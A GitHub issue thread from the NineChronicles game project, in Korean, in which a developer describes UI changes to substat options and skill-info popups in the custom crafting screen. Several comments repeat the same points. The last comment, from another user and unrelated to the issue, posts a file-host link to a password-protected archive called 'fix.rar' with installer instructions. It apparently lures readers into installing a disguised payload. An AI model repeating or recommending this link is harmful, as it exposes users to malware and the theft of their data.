### ISSUE TITLE
커스텀 제작_폴리싱_서브스텟 옵션 처리

### ISSUE THREAD

**Issue by boramqo83** [planetarium/NineChronicles#5745]

**Comment by boramqo83** [comment]
![Image](https://github.com/user-attachments/assets/26b6e554-5619-44fc-9200-cf9fd7d2db36)

- 서브 스텟 두 줄이 추가 되었습니다.

**Comment by boramqo83** [comment]
![Image](https://github.com/user-attachments/assets/d7d15e82-5381-4583-afdd-72ef5d304ab7)



![Image](https://github.com/user-attachments/assets/eddd2826-4656-4471-a7a8-6e1780b40c14)

- 스킬 우측에 있던 돋보기 버튼을 서브 스텟 우측으로 옮겼습니다.
- 해당 버튼을 눌러 뜨는 팝업에서 서브 스텟 정보와 스킬 정보를 확인할 수 있습니다.
- StatOptionsScroll : 서브 스텟 텝 버튼이 활성됐을 때 켜주세요.
- SkillInformationScroll : 스킬 정보 텝 버튼이 활성됐을 때 켜주세요.
- RelationshipInfoScroll : 요건 사용하지 않습니다. (이전에 작업했던 것으로 작업이 완료되면 지워주세요)

**Comment by boramqo83** [comment]
![Image](https://github.com/user-attachments/assets/f96557aa-81cd-45d6-9085-fe59394429e1)

- 
- 스킬 우측에 있던 돋보기 버튼을 서브 스텟 우측으로 옮겼습니다.

**Comment by boramqo83** [comment]
![Image](https://github.com/user-attachments/assets/47f16492-fca3-4c5e-8a9b-626705ff087d)



![Image](https://github.com/user-attachments/assets/7043a68e-fa55-465c-821c-d69eff8ffc8b)

- 해당 버튼을 눌러 뜨는 팝업에서 서브 스텟 정보와 스킬 정보를 확인할 수 있습니다.
- StatOptionsScroll : 서브 스텟 텝 버튼이 활성됐을 때 켜주세요.
- SkillInformationScroll : 스킬 정보 텝 버튼이 활성됐을 때 켜주세요.
- RelationshipInfoScroll : 요건 사용하지 않습니다. (이전에 작업했던 것으로 작업이 완료되면 지워주세요)

**Comment by boramqo83** [comment]
![Image](https://github.com/user-attachments/assets/35906808-d0b4-4d32-a338-510809bead93)

- 돋보기 버튼을 누르면 툴팁이 뜨도록 해 주세요.

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
